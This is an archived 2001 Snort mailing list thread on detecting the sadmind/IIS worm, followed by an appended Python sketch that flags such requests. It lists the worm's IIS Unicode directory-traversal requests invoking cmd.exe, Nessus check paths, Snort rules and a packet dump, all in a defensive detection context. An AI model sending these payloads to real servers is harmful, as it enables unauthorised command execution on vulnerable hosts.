Snort mailing list archives
Re: sadmind rule
From: Polar Bear <polus2000 () yahoo com>
Date: Wed, 9 May 2001 15:08:20 -0700 (PDT)
Hi all,

The combination of these two rules is great. Also we can run Nessus against all/suspected hosts using GUI or from command line/script:

    nasl -t host.in.question /usr/lib/nessus/plugins/iis_dir_traversal.nasl

or do it all manually. (Here is what the sadmind/IIS worm sends, although I'm not sure, haven't seen the code compiled from different sources):

    GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    GET /online/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
    GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
    GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
    GET /scripts/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
    GET /msadc/..%e0%80%afq../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+..\ HTTP/1.0
    GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0

Nessus does 5 checks (do we need to add more?):

    /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    /..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\

Zh.
--- On Wed, 9 May 2001, Andrew Daviel wrote:
We were just hit by the sadmind/IIS worm
http://www.cert.org/advisories/CA-2001-11.html

I've been trying to retroactively find what might have been actually
attacked buried in all the port 80 traffic:

    alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: "sadmind"; flags: PA; content: "GET /scripts/root.exe"; )

It's also nice to have a generic rule that looks for IIS boxes responding to the "dir" requests with an actual directory listing. For example something like:

    alert tcp $INTERNAL 80 -> $EXTERNAL any (msg: "Directory listing response - possible vulnerable IIS"; flags: AP; content: "|20 44 69 72 65 63 74 6F 72 79 20 6F 66|"; depth: 13;)

...which may catch something like:

    VULN_IIS:80 -> ATTACKER:41742 TCP TTL:127 TOS:0x0 ID:33953 IpLen:20 DgmLen:1500 DF
    ***AP*** Seq: 0xDF622603  Ack: 0xF95527CF  Win: 0x4411  TcpLen: 20
    20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 63 3A   Directory of c:
    5C 70 72 6F 67 72 61 6D 20 66 69 6C 65 73 5C 63  \program files\c
    6F 6D 6D 6F 6E 20 66 69 6C 65 73 5C 73 79 73 74  ommon files\syst
    65 6D 5C 6D 73 61 64 63 0D 0A 0D 0A 32 30 30 30  em\msadc....2000
    2D 31 30 2D 30 39 20 20 30 39 3A 32 39 20 20 20  -10-09  09:29
    20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20 20      <DIR>
    20 20 20 2E 0D 0A 32 30 30 30 2D 31 30 2D 30 39     ...2000-10-09
    ...

Regards,
Andreas Östling
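As an added illustration (not code from this thread, from Snort or from Nessus), a small Python check that applies the idea behind these rules to HTTP request lines: it percent-decodes the target, folds the overlong UTF-8 escapes seen in the probes quoted above (%c0%af, %c1%9c, %e0%80%af, ...) back to the "/" or "\" they stand for, and then labels traversal-to-cmd.exe and root.exe requests the way the Snort rules do. The sample request lines are constructed, and the multi-byte folding mimics a lenient decoder in general rather than any particular IIS version.

```python
import re
from urllib.parse import unquote_to_bytes
# (mask, lead value, payload bits, trailing bytes) for 2..6 byte UTF-8 forms.
_LEADS = [(0xE0, 0xC0, 5, 1), (0xF0, 0xE0, 4, 2), (0xF8, 0xF0, 3, 3),
          (0xFC, 0xF8, 2, 4), (0xFE, 0xFC, 1, 5)]
_TRAVERSAL = re.compile(rb"(?:^|[/\\])\.\.[/\\]")
_TARGETS = (b"cmd.exe", b"root.exe")

def normalize(target):
    """Percent-decode, then fold multi-byte UTF-8 forms whose value is below
    0x80: 'overlong' encodings of ASCII (%c0%af -> '/', %c1%9c -> '\\') that
    no compliant encoder emits but the IIS decoder accepted. Returns the
    lower-cased path and the number of overlong forms folded."""
    data = unquote_to_bytes(target)
    out, overlong, i = bytearray(), 0, 0
    while i < len(data):
        b = data[i]
        for mask, lead, bits, n in _LEADS:
            if b & mask == lead and i + n < len(data):
                cp = b & ((1 << bits) - 1)
                for t in data[i + 1:i + 1 + n]:  # trailers are not validated
                    cp = (cp << 6) | (t & 0x3F)
                if cp < 0x80:  # overlong form: fold to the ASCII byte it hides
                    out.append(cp)
                    overlong += 1
                    i += n + 1
                    break
        else:  # ordinary byte, or a genuine (non-overlong) multi-byte char
            out.append(b)
            i += 1
    return bytes(out).lower(), overlong

def classify(request_line):
    """Label a request line like the probes quoted above; None if benign."""
    path, overlong = normalize(request_line.split(" ")[1])
    traversal = _TRAVERSAL.search(path) is not None
    hits_target = any(t in path for t in _TARGETS)
    if overlong and traversal:
        return "IIS unicode traversal (%d overlong escapes)" % overlong
    if traversal and hits_target:
        return "directory traversal to command interpreter"
    if hits_target:
        return "direct request for cmd.exe/root.exe"
    return None

# Constructed samples in the shape of the probes in the post (not captured traffic).
SAMPLES = ["GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
           "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
           "GET /scripts/root.exe?/c+dir HTTP/1.0",
           "GET /index.html HTTP/1.0"]
```

Running `classify` over `SAMPLES` flags the first three and leaves the plain request alone; a genuine non-ASCII character such as %c3%a9 is not counted as overlong, so ordinary international URLs do not trip the check.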
Current thread:
- sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Max Vision (May 09)
- Re: sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Andreas Östling (May 09)
- Re: sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Andreas Östling (May 09)
- Re: sadmind rule Chris Green (May 09)
- <Possible follow-ups>
- RE: SadMind rule Steve Halligan (May 09)
- snortsnarf Aaron McKinnon (May 09)
- Re: sadmind rule Polar Bear (May 09)
- Re: sadmind rule Max Vision (May 09)